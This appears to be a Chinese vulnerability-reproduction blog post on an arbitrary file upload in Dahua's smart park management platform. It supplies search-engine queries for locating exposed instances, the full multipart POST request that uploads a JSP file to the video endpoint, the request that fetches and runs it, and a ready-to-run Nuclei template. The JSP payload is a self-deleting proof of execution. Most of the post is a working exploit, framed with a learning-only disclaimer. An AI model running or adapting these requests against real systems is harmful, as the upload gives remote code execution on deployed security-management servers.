【漏洞复现】大华-智慧园区综合管理平台-wpms-video-任意文件上传
发布时间
阅读量:
阅读量
目录
免责声明
0x01 产品简介
0x02 漏洞概述
0x03 网络测绘
0x04 漏洞复现
0x05 Nuclei
免责声明
此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时私信我们
0x01 产品简介
大华智慧园区综合管理平台是一款基于云计算、大数据、人工智能等技术的智慧园区管理解决方案,可为园区提供运营管理、综合安防、便捷通行、协同办公等多项功能,帮助园区实现安全等级提升、工作效率提升、管理成本下降。
0x02 漏洞概述
大华智慧园区综合管理平台允许攻击者通过 video 接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
0x03 网络测绘
fofa-query: app="dahua-智慧园区综合管理平台"
hunter-query: web.body="/WPMS/asset/lib/json2.js"0x04 漏洞复现
POST /publishing/publishing/material/file/video HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 343
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
<%out.print(111 * 111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--
GET /publishingImg/VIDEO/240201105739161154.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Accept: */*
Accept-Encoding: gzip
Connection: close
Content-Type: multipart/form-data; boundary=od4cH1jSxG0x05 Nuclei
id: dahua-wpms-video-fileuplod
info:
name: 大华-智慧园区综合管理平台-wpms-video-任意文件上传
author: rain
severity: high
metadata:
fofa-query: app="dahua-智慧园区综合管理平台"
hunter-query: web.body="/WPMS/asset/lib/json2.js"
http:
- raw:
- |
POST /publishing/publishing/material/file/video HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
<%out.print(111 * 111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--
- |
GET /publishingImg/{{paths}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Connection: close
Accept: */*
Content-Type: multipart/form-data; boundary=od4cH1jSxG
Accept-Encoding: gzip
extractors:
- type: json
name: paths
json:
- ".data.path"
internal: true
matchers:
- type: dsl
dsl:
- contains(body_2,"12321") && status_code==200全部评论 (0)
还没有任何评论哟~